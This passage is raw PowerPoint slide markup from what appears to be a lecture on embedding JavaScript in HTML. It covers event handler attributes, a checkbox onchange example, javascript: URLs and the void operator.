                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397627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 JavaScript into HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to be interactive, a JavaScript program must define event handlers—JavaScript functions that are registered with the web browser and then invoked by the web browser in response to events (such as user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript code can register an event handler by assigning a function to a property (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) of an Element object that represents an HTML element in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>document</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701974" y="4328883"/>
            <a:ext cx="7791688" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"checkbox" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"options" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"giftwrap"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>onchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>giftwrap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>checked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3359660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 JavaScript into HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event handler attributes defined in HTML may include any number of JavaScript statements, separated from each other by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>semicolons</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML event handler attribute consists of a simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>assignment or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a simple invocation of a function defined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>elsewhere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The commonly used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>handlers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onmousedown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onmouseup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onmouseout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="626637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 JavaScript into HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript code can be included on the client side is in a URL following the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>specifier</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The “resource” identified by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL is the return value of the executed code, converted to a string. If the code has an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>undefined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> return value, the resource has no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL anywhere you’d use a regular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729284" y="4057746"/>
            <a:ext cx="8078452" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>javascript:new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A7A43"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>toLocaleTimeString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>();"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>    What time is it?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2188787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 JavaScript into HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you want to ensure that a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL does not overwrite the document, you can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> operator to force an invocation or assignment expression to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>undefined</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="243E79"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="243E79"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="243E79"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Without the void operator in this URL, the return value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() method call would </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>converted to a string and displayed, and the current document would be overwritten by a document that contains [object Window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="243E79"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710081" y="2551837"/>
            <a:ext cx="7332952" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
